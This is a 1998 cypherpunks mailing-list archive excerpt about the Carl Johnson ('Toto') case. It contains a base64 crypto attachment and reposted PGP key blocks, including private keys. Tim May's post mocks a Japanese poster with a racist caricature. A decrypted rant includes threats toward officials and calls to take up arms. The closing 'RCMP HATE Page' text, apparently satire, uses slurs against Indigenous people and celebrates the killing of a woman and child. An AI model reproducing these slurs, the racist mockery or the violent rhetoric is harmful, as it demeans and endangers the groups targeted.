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
AAAA
--Boundary..3996.1071713798.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 9 Sep 1998 14:10:10 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Carl Johnson Warrant and Complaint
Message-ID: <199809091908.VAA07970@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> Why would you claim only one person possessed the secret key? As you
> doubtlessly know, some of the TruthMonger secret keys have been posted
> to Cypherpunks anonymously. This is not authentication. Thank you.

Prove it.  Post the archived message where these secret keys were posted.
Let's see the one which signed:

http://www.inet-one.com/cypherpunks/dir.97.12.04-97.12.10/msg00356.html

Note to the clueless guy@panix.com, who asks:
> Entirely unexplained is how one goes from passphrase "sog" (Shit on government?)
> to decrypting the PGP message.

I'm impressed.  You're actually stupider than Jeff Gordon, the IRS flunky.
He was able to figure it out, so why don't you try.  Ask your kindergarten
teacher to give you a gold star once you fumble your way to the answer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Raymond D. Mereniuk" <Raymond@fbn.bc.ca>
Date: Wed, 9 Sep 1998 23:13:02 +0800
To: cypherpunks@Algebra.COM
Subject: Spot The Fed
Message-ID: <199809100428.VAA17926@leroy.fbn.bc.ca>
MIME-Version: 1.0
Content-Type: text/plain



About a week ago I sent a message the list regarding Toto and how I 
found it hard to believe he was a country & western artist.  I 
mentioned a tribute to Toto and an URL pointing to a web page on a 
data security product at a web site which is total spoof.

The URL lead to a page touting a data security product called PUP, 
Pretty Useless Privacy.  I shamelessly plagiarized Toto's concept, 
and even some of sentences, from a post on Pretty Lousy Privacy.  
I even managed to get most of the characteristics of Snake Oil in 
one sentence.  The graphics on the page is a Snake Charmer.

Now you figure the Feds will visit for sure, just try and spot them.  
Resolve the IP addresses to a domain name might work but if they 
had a clue they would use dummy domains.

I would like to nominate the folks at IP address 204.249.179.54, or 
better yet the whole Class C as possible Feds.  The IP address does 
not resolve to a domain name, actually all the IP address in the 
Class C plus the 204.249.178 Class C.  I didn't bother to try any 
other neighbouring Class Cs.

I can understand a few IP addresses of isolated machines not 
resolving to a domain name but not the whole Class C.  You should 
also be able to see the default gateway's domain name.  

Seems like this may be the site of some paranoid privacy loving 
folks.  If I have slandered any Cypherpunk and their company, who 
may be at least privacy loving, please accept my apologies in 
advance but please let me know if I made a mistake. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 9 Sep 1998 23:56:37 +0800
To: cypherpunks@Algebra.COM
Subject: Misty bot  (Re: MISTY encryption algorithm source code)
In-Reply-To: <19980910035745.18097.qmail@hotmail.com>
Message-ID: <v03130301b21d0b70112d@[209.133.20.4]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:57 PM -0700 9/9/98, Nobuki Nakatuji  <bd1011@hotmail.com> wrote:
>MISTY source code posted by me at long ago had many mistake.
>Attachment file are revised MISTY source code and revised readme.
>Thanks.
>

Does this guy have any life besides popping up every several weeks and
making a stupid comment about "MISTY"?

He never engages in debate, he never comments on things going on in Japan,
he never comments on export issues, he doesn't even defend himself from our
criticisms. He must be a bot...the Misty bot.

"My name Nobuki-san. You send money, I send source. Chop-chop, you go now.
I go read Misty Manga. "

(This last paragraph thrown in to make sure the various folks redolent with
"Caucasian guilt" will snort and sniff and claim I am a racist...because
Nobuki Nakatuji, with his suspicious "hotmail.com" address, sure won't step
forward.)

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 10 Sep 1998 00:10:24 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Toto describing a visit from SS agents
In-Reply-To: <199809100035.BAA07635@server.eternity.org>
Message-ID: <Pine.GSO.3.95.980909220905.16915C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



I mention the alleged threats against the president in my article today,
and link to the email.

-Declan

On Thu, 10 Sep 1998, Adam Back wrote:

> 
> Again while searching for keys, another encrypted message (Subject:
> Secret Service With A Smile - SAHMD!!! / Pwd: lco, Date: 31 Jul 98)
> this message appears to refer to a visit from US Secret Service
> agents, apparently due to their imputing some kind of threat to US
> president(?) in one of Toto's rants.
> 
> Decrypted copy below [1].
> 
> Adam
> 
> [1]
> ======================================================================
> Secret Service With A Smile - SPACE ALIENS HIDE MY DRUGS!!!
> ___________________________________________________________
> 
>   It was only natural for me to wonder what it was about the Secret
> Service Agents who visited me today that enabled them to act like
> decent, pleasant people during the course of the personal interview
> portion of their investigation into my life and psyche.
> 
>   The question was answered, to my satisfaction, at the point when
> the more veteran of the two agents explained that, despite my
> rugged handsomeness and my delightful personality, they would have
> to CrushMeLikeABug if it became apparent to them that my already
> tentative physical and mental existence came into conflict with
> their official duty to protect the President of the United States.
>   I realized that they were professionals, with a high degree of
> integrity, and that their concern probably went far beyond the
> fact that if the Nation lost the CommanderInChief on their shift,
> they could pretty much kiss their Christmas Bonus goodbye...
>   It was also apparent that their ability to be quite reasonable
> and pleasant human beings--while making it plain that informing me
> that putting me away for observation in Springfield, Missouri,
> could easily take away a full year of my life, was *meant* to be
> a threat--without having to engage in a heavy-handed affectation
> of MachoAuthority, was the result of their actually *having* the
> authority to decide, here and now, whether or not my life would
> instantly become a living hell.
> 
>   The Secret Service Agents were also extremely intelligent, not
> even blinking before passing on my offer to testify against myself,
> in return for immunity from prosecution.
>  (When I made the same offer to RCMP OffalSlurs, they had to 
>   contact their superiors, who held a meeting with OffalSchills
>   behind the closed doors of the Canadian Justice Apartment,
>   before finally declining my offer.)
> 
>   I was able to relax and be cooperative in dealing with the 
> Agents, since, when your fate is in the hands of someone with
> GenuineAuthority, whether their intentions are GoodOrEvil (TM)
> is not nearly as important as to whether or not they happen to
> be StupidFucks (TM) who can ruin your life over something as
> simple as misunderstanding your request that they make their
> questions more 'lucid.'
>  ("That's it, you sick, fucking pervert! Jim, get the kilo of
>   heroin out of the trunk...")
> 
> Wrong Question #29 When Dealing With StupidFucks:
>   "Excuse me, but do your employers *know* that you carry a gun?
> I mean, have they ever met you, or were you hired by mail? Can
> you actually shoot a gun without moving your lips?"
> 
>   Although the Secret Service Agents were in possession of an
> email I had sent a few minutes or hours previously, from Pima
> College --> <erehwon@dis.org> (who I immediately tried to Rat
> Out as the leader of a ChildSexRingDedicatedToTheViolentOver
> ThrowOfTheUSGovernment, in order to save my own skin), the
> agents seemed much more interested in a chapter of SAHMD!!!
> which contains notification of an OfficialDeathThreat to pretty
> much DoGodAndEverybodyOnTheFaceOfTheEarth.
>   I tried to placate them by reaching over with a pen and adding
> an 'Un' in front of the word 'Official,' but they were not really
> impressed, informing me that the point they were trying to make
> had to do with it being unacceptable, from their point of view,
> for me to use the words 'Death,' 'Threat,' and 'President' all
> in the same paragraph, let alone all in the same sentence.
> {"Well, excuuusssee *me*!"}
>   Realizing that it was probably not an opportune moment to try to
> hit them up for a donation toward the maintenance of my planned
> PresidentialDeathThreatAnonymousRemailer, I casually turned the
> donation jar so that they couldn't see the label, and I set it
> down.
> 
>   Actually, I couldn't be certain that I had actually written the
> chapter, or portion thereof, with which the agents seemed most
> concerned, since I find it difficult to distinguish between the
> work that is mine alone, and the work that is a collage of various
> participants in the writing and dissemination of 'The True Story
> of the InterNet' manuscripts, if I don't have access to the files
> on the computer on which they were created and stored.
>   Nonetheless, I refrained from pointing out that the phrase that
> indicates that the writer "might" conceivably "whack" someone or
> another GovernmentPersonage, might equally apply to the stance
> taken by the Secret Service Agents, themselves, if the Founding
> Fathers were to be believed when they indicated that it is the
> right and the duty of the citizenry to take up arms against their
> rulers, if need be, in the interest of Democracy, Freedom, Justice,
> or in DivineRetribution against the High&Mighty if they take a drink
> out of your beer while you're in the restroom, having a leak.
>  (I'm not certain about that last example, but I have no doubt that
>   the Founding Fathers *meant* to include that...)
> 
>   I refrained from attempting to engage the Agents in philosophical
> debate in regard to some of the finer points surrounding the issues
> of Freedom of Speech, since the purpose of their visit was obviously
> geared toward impressing upon me the duties encompassed by their job
> description, their professional competence in doing their job, and
> the fact that the necessity of making a return visit would very
> likely be an indication that Uncle Sam was about to become my new
> landlord.
>   To tell the truth, I was in a pretty scattered state of mind at
> the time of their visit, and I undoubtedly failed to adequately
> understand a good portion of the dialogue which took place, but
> they were very clear in explaining that, given my current state
> of unwelcomeness in Canada, I am running out of countries to go
> to, and that I should give serious consideration as to whether or
> not I wanted my next Literary Spamology to be titled, "Midnight 
> Express II."
>   Hhhmmm...decisions, decisions...
> 
>   Since my reading of the Secret Service Agents is that they are
> highly ethical professionals, with little need to persecute an
> individual out of thin-skinned, personal vindictiveness, I guess
> it wouldn't hurt to mention that, minutes after their departure,
> Linda Lou arrived home, announcing that there was yet another
> Tarantula in the driveway, headed toward the house...
> 
>   The obvious conclusion, of course, is that the Secret Service
> Agents are actually Reptilian Nazis, who are deeply involved in
> the WorldWidePlotAgainstMe.
>   This, in turn, leads to the dilemma of whether or not I should,
> on the occasion of a return visit, jump them and drive wooden stakes
> through their hearts, turning them into quivering pools of smoking,
> green slime. 
>  (Or is that Vampires? Shit! I'd better check, first, or it could
>   lead to a really embarassing situation.)
> 
>   On the other hand, since they were quite civil and reasonable
> in their dealings with me, and they apparently didn't eat any of
> the dogs, while here (although it might have been a different
> story, if we had poodles), then perhaps their is a chance that
> we and the Reptilian Nazis can live together in peace...unless it
> is a SneakyTrick (TM), of course...and they are trying to *confuse*
> me, so that I don't warn TheOthers...and they were only so pleasant
> because they were inwardly laughing at me for not realizing that,
> starting tomorrow, they are going to take control of the whole face
> of the globe, turning all humans into LobotomizedSlaves who exist
> only to serve their ReptilianNaziMasters!
> 
> QUICK, EVERYBODY! ARM YOURSELVES AND RUN FOR YOUR LIVES!!!
> PREPARE TO ENGAGE THE REPTILIAN NAZIS IN VIOLENT, BLOODY STRUGGLE!
> START BY WHACKING OUT THE LAWYERS, AND THEN...
> 
>   Hold it! What the fuck am I ranting on about?
>   The Masses are *already* LobotomizedSlaves who exist only to serve
> their ReptilianNaziMasters...
> 
>   Maybe the agents were just here to see whether or not Baby is a
> poodle.
>   That makes more sense, since the Reptilian Nazis don't really 
> give a FatRat'sAss about the Jews, but they *do* want to round up
> all of the poodles shortly before the arrival of their Reptilian
> Nazi Relatives, so that there is plenty of barbeque at their
> PicnicToCelebrateTheConquestOfEarth.
>   Yeah, that's gotta be it...
> 
>   Actually, I'm rather glad that the Secret Service Agents dropped
> around to meet me in person, since people reading my copious literary
> effluvia sometimes mistakenly get the impression that I am some kind
> of Dogamned Weirdo, or something.
>   Still, I wish I had been able to refrain from going, "Cuckoo-Cuckoo"
> on the hour and the half-hour during their vist.
>   But, what the hell...I bet that a *lot* of the people they visit
> do that...
> ======================================================================
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 9 Sep 1998 16:35:45 +0800
To: jimg@mentat.com
Subject: Re: Carl Johnson's private key
In-Reply-To: <199809092006.NAA10324@zendia.mentat.com>
Message-ID: <199809092125.WAA05951@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Jim Gillogly writes:

> I stopped paying attention to most of Truthmonger's spew, but did
> collect one private key it posted, under the name "Earmonger", since
> I was doing PGP experiments at the time.  I think this one doesn't
> have an associated passphrase, which would make forging with it
> quite simple.

That was just a public key, though right?  Was a corresponding private
key posted?

> I sort of think more of its private keys were posted, but I didn't
> keep any others.  This does, however, establish a pattern of
> behavior suggesting it didn't keep private keys strictly private.

Well let's see how many Toto keys we can find which were posted to
cpunks.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: User of DOOM <nobody@seclab.com>
Date: Wed, 9 Sep 1998 16:18:55 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
In-Reply-To: <3.0.5.32.19980909005149.0081d100@mail.xroads.com>
Message-ID: <199809092115.XAA24879@rogue.seclab.com>
MIME-Version: 1.0
Content-Type: text/plain



>>>>> William J Hartwell <billh@ibag.com> writes:

  > I think a radio network linked to the Amateur networks sending
  > secure packets, using tunneling or maybe just encrypted traffic

FCC regulations prohibit amateur radio services from carrying either
encrypted OR commercial traffic.  Either of these restrictions makes
amateur radio networks useless for CP purposes.  And hams are very
diligent at self-enforcement, often devoting hundreds of man-hours to
track down a single unlicenced operator.

Anyone who wishes to establish a network that may -- at any point in
its life -- have to operate outside the "law" (whatever THAT happens
to be at the time) will be well advised to steer clear of the amateur
radio community.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Thu, 10 Sep 1998 10:57:40 +0800
To: cypherpunks@einstein.ssz.com
Subject: No Subject
In-Reply-To: <Pine.BSF.4.02A.9809090755430.270-100000@smarter.than.nu>
Message-ID: <3859418bc3deb43600e8455d83581c55@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>>>>> Brian W Buchanan <brian@smarter.than.nu> writes:

  > I'd love to see them try to enforce that... Anyone have
  > the text of the actual rules concerning this?

This is enforced very strictly, with the diligent help of the amateur
radio community itself.

CFR47 says:

97.113 Prohibited transmissions. 

(a) No amateur station shall transmit:

  (1) Communications specifically prohibited elsewhere in this part;

  (2) Communications for hire or for material compensation, direct or
  indirect, paid or promised, except as otherwise provided in these
  rules;

  (3) Communications in which the station licensee or control operator
  has a pecuniary interest...

  (4) Music using a phone emission except as specifically provided
  elsewhere in this section; communications intended to facilitate a
  criminal act; messages in codes or ciphers intended to obscure the
  meaning thereof, except as otherwise provided herein; obscene or
  indecent words or language; or false or deceptive messages, signals
  or identification;

  (5) Communications, on a regular basis, which could reasonably be
  furnished alternatively through other radio services.

(b) An amateur station shall not engage in any form of broadcasting...

[...]

97.117 International communications. Transmissions to a different
country, where permitted, shall be made in plain language and shall be
limited to messages of a technical nature relating to tests, and, to
remarks of a personal character for which, by reason of their
unimportance, recourse to the public telecommunications service is not
justified.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 9 Sep 1998 18:33:45 +0800
To: jya@pipeline.com
Subject: Re: A Cypherpunk Trial, Yes
In-Reply-To: <199809092216.SAA19854@dewdrop2.mindspring.com>
Message-ID: <199809092321.AAA07068@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




John Young writes:
> Adam Back wrote:
>
> >The collection of Toto's keys that he did post and the date he posted
> >might be useful to archive at jya.com so that we can see which if any
> >of Gordon's claims of proof of authentic Toto messages are valid.
> 
> Yes, this is a crucial point. The innuendo of the complaint needs
> checking, and read with a heap of salt, although it's probable that 
> the Feds have more than revealed so far. 

I've been searching through looking at posts containing BEGIN PGP
MESSAGE (ignoring the pgp-mime signatures which use the BEGIN PGP
MESSAGE).

Looky here, here's a "TruthMonger <tm@dev.null>", posted back in Sept.
97 (Toto's post below, so you can search for it in your cpunks mail
folder/search engines/web based cpunks archives [1]).  You were right
Jim.

Is this key the one used to sign any of the Toto rants, especially the
ones the IRS agent has been poring over and referring to in the
warrant?

It has a sig on it from 0x66FB8C65.  Any one fancy working out the set
of Toto public keys which are cross certified?  There are quite a few
keys I think.

Adam

[1]
======================================================================
Date: Tue, 23 Sep 1997 01:58:52 +0200 (MET DST)
Subject: Persistent Persona
To: cypherpunks@toad.com
From: nobody@REPLAY.COM (Anonymous)

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

lQHgA4dN5oIAAAEEAM/3b3wHc1iQEmtk9NQhmrHmZmlCdZH4T3kf2APlwA/NRsfU
pAa++0pBdgMMOr9QBMWNWuRuZriEUE/jH9cdMkgBeOrvsviFSe2wN074LrCZSugO
6KabPwokodYl8+R8xY5NC1pZUD4sYf49L6xOwpjiXukrRKqwABp0s99tXiQlAAUR
ARwSOk76t7D7A/0n7XVeJ5qLKatxrzKZ1+U9PLhEeeQkknETkj9aFmRNrj/I4n/Y
TgxKh74zK1/kM4y6bunTNU6+pBDPrvYJgqoq4kMlS3jXNdGBFn0Tw0j2klSZpXzA
Tb593tKD66dztQXiYbYYhydQixUp22NwjruiIfwjFdtU7tOhKfLgZ+dGJQIAH40N
9Gpt3oSQ+ua6I1mOEYzWXdH8HdaNQKxGVRYVH71Wi2TpDLuZbbYq6RB9LDQ0VJO0
6DumKr1OSG32zda+kwIAvjPYd8xEOyCo2NJfL2ZUBh9/GC9nb9UTxdwFP7AFx0F7
DTA+prGb672ly3NAa7/gje2W4isd3NN+T6T13WHmcAH+MnnMDMclF/hNKrhR39aB
1ZvVEBh8yz8xWCm5BQOqp55KyJGgDY0kAcwqejE0PHV8dMG6TVteVvOu7D7GDFcB
4KXvtAtUcnV0aE1vbmdlcg==
=HBLx
-----END PGP MESSAGE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzOCm1EAAAEIANB5WCFbEjUhNaZ2cEWuh9xcP48QBixzJpxPqGc0Sogj9W1L
ezM5GDF0tZp5ksNbWf5+ErNxXo0yOM7LjDl+sRrEmcbuTkjqPJxG/q4JZ7Al3/FF
h1SFGWpQNz9BPewgHS8/Lp9Ywl+ELeau+FPrr/xmktYifBBaaPUTS5oNMhn4Ih0r
yez6WFn6lRYz+FLsXchjkg+I22tC1aD6iKv/BxCM//GzJ8UNkE7Vx94jZxJ/0vqE
3msqN1coj99okoggWzR5xe/wcLjUjXBw4Z208zhKNEC1AemkJV5HSbztfOgpZOqX
4dwsSDREfFcerM3gusIv3Gz+oU5WPTNSVeg5/HkABRG0GVRydXRoTW9uZ2VyIDx0
bUBkZXYubnVsbD6JARUDBRAzgptRPTNSVeg5/HkBAXUeB/4y3/VlUzua8TVbAiTW
KPXvqTq28XHrhNrTiDWXX7KaFmRyZC20OLbRNtJH1XJUeZv7yhxXkIO2jW6e1i95
MWcx0JAheNjdqKAdNFUVaqs6R2+ySAU7PtfbfVx/RUxsTW8jLfppI7ajTf3E9z3u
nO6NpN/z74DO659tiwfNjT8YoRH3EEomSKNZ3yIGhbyTHv+FOrJs8sQ3jhqmFb37
nr0er1+BWi9Sr2LS7aK+iCK/ZKhUqaofkoo6S/M6nTWKU7RiDhvK0wm40Lassb83
z3NjwN2NNZDwCPYM3d12LjxWA70qljx/qsSRptvkDmnLKXnEUvTsnf9dErhpYLtg
yGBFiQCVAwUQM4LW/7BfjJBm+4xlAQEbJAP/RsKZ/khOS+4nD7JfPnKMKMVjDOif
x0enjzf7kW//GnMsi70yaYi6QeoT0YUYVNQ+wWwGUPgAejs2PLk1VIbn4GIvRU+1
Uj6xTTfHkIibUtvz7LtC/JmNafWSETDnJOlqszgzTnE0duDwZ83ISWdzHkhEXnfC
BxcPay75u1zC6FQ=
=j6da
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 9 Sep 1998 19:17:22 +0800
To: cypherpunks@cyberpass.net
Subject: more keys
Message-ID: <199809100002.BAA07374@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




OK here's some more keys:

[1] for "Magic Circle"

[2] for "Necessarily Knott, ME"

Again were these keys used to sign anything interesting?

Key [1] was preceeded, perhaps meaningfully by this text in the long
(22k) Epilogue 5:

: Now:
: 
: Go home, kick your fucking door in, place a disk in the floppy drive, and
: type 'pgp -kxa "My KeyID" a:\secring.asc secring.pgp'.
: Mail the disk to Louis J. Freeh
: 
: Does your copy of PGP ask for a password before spitting out the KeyID
: to any one of a thousand monkeys who sits at your keyboard and
: randomly types in the above?
: 
: My copy doesn't.
: 
: Below is a copy of a key pulled off of my computer by 19 different people.
: 
: It was pulled off of my hard drive by the first individual, who
: proceeded to inform a second individual of the method used, and
: challenged them to do the same thing, using a different method. The
: second did so, and passed all the information along to a third person,
: etc., etc.
: 
: Nineteen people, nineteen different methods.

if Toto apparently speaks in parables, and via fiction etc. is he
saying that the RCMP or someone else pulled his keys off his
computers?  How does this correlate with his posts on the subject of
hassles with the RCMP, and confiscation of some of his machines?

Adam

[1]
======================================================================
This one has userid: Magic Circle

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

lQHgAzHiUJEAAAEEAP1slPSwrVd90NVBqfsw6+JP64icmuSrztzyCgaPcXHRiy/J
Kbgi9/gy1iCnWcQh1ATaSzblATSU24Xw+4Ow4s5xOvdxFGoIop6EXwTNfwRa2EZr
6ZZ41Glr9g1g9H0RJwJlkldUcunVNekXel1MYA8VJJynvtZVuntA11SbF0AdAAUT
Ab7sJWrM/6azA/vV2wq4sdyfngUgUHq8Hlo5NHvEjyh2cSoMMNxnpKR3+XYRbYTd
HhwfbOvji1cWnVJF6GBxe3nLvbkbHJU+K3hNNYOT9JKMahu+5wKMbHkwToSsLzyQ
kgn2JlKDJugoycdjInlQs7NiyoOrIYWQzSi4yGbhl2t1Au+67UY/r57J9AIA8V/6
J5x1wH7MACSWU91jXXxpJvSud053nrSgnupEUbFX3dXm0GXf6vdhbQW9eYsIJmCI
pZLrqwBcFe2GWhk9AAIActyoxAgCvFyGSJHHzJVVoKfWk/gjmKs/r7+J9vWnBAkc
Pg0wqUn66Hmq0op28gEXU3qKJiJ8rAQETAxBhfpnJgH83CrrEZDcBY8IKsFI2A19
KahohyDXmsEHIWqKZLSwzjsYcf049RCUxNDPJZchuoMEPkK9414KyPqlJbStsFaE
YZ6itAxNYWdpYyBDaXJjbGU=3D
=3DGEo6
-----END PGP MESSAGE-----

and it was posted in a message dated 20 Oct. 97 with Subject: InfoWar
Epilogue 5 / TEXT
======================================================================

[2]
======================================================================
-----BEGIN PGP MESSAGE-----
Version: 2.6.2

lQD4AzRmZWoAAAECAMnJrqd/TERCLeFscdgNvwVxrVG4tRm0VThMEXXkctCGMaUD
jcETxcV0ZseRUcyUKfqlLd3CRsIwClozlWHHR7EABREAAfwJ5D1Ecilit/Mwsn4N
GcWZXWpg3mM6/Epzs2pEhi3I926ZiWPB1DKmdZR4nVemsnwv47SWLJyCnE4sben5
h8oHAQDTFaJDJSN7+9NToOE4NFiruAXXMIHEQ6ZH21oW1sYSiwEA9LmhvfahDVKo
1/CMtxxozAtG8rWycBYVIVrkDKiVgjMBAKeB2VY/f7tzmv7KxUUtN9607+CQlWPp
E3HBLTlwtuRAUxC0FU5lY2Vzc2FyaWx5IEtub3R0LCBNRQ==
=caeb
-----END PGP MESSAGE-----

posted in a message dated 10 Nov. 97 with Subject: Key Signing 
======================================================================

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 9 Sep 1998 20:20:22 +0800
To: jya@pipeline.com
Subject: RCMP hate page still around?
Message-ID: <199809100017.BAA07580@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Toto's web pages at sympatico are I think gone (or at least disabled).

Whilst searching for more Toto private keys I found this encrypted
message (Subject: Prologue 14/0 -- Passoword: cypherpunks), posted 26
Mar. 98.  You have to use a passphrase in all CAPS to get it to
decrypt.

Text below (seems to be a rant about police abuse, I presume some
local news item in Canada).  Hardly one thinks worthy of receiving the
attentions of the RCMP...  Wonder why the RCMP decided to confiscate
Toto's computers (and get his account at sympatico first monitored and
one presumes then cancelled).

Adam

======================================================================
                               The Official

                       Royal Canadian Mounted Police

                                 HATE Page

Kudos of the week go to Constable Dave Voller, who legally murdered a
gun-toting Wagon-Burner and the nine year old future glue-sniffer clinging
to her skirt.

Congrats, Dave. A hundred points for the woman, and five hundred for the
kid...

This is a good time to remind RCMP Officers across Canada that, despite our
long history of exercising a strong hand (and an even stronger nightstick
;?) in keeping the Wagon-Burners from storming the gates of white society,
current social and legal trends make it necessary for us to take every step
necessary to cover our ass when we take those measures needed to keep them
in their proper physical place (the reservation) and to keep them in their
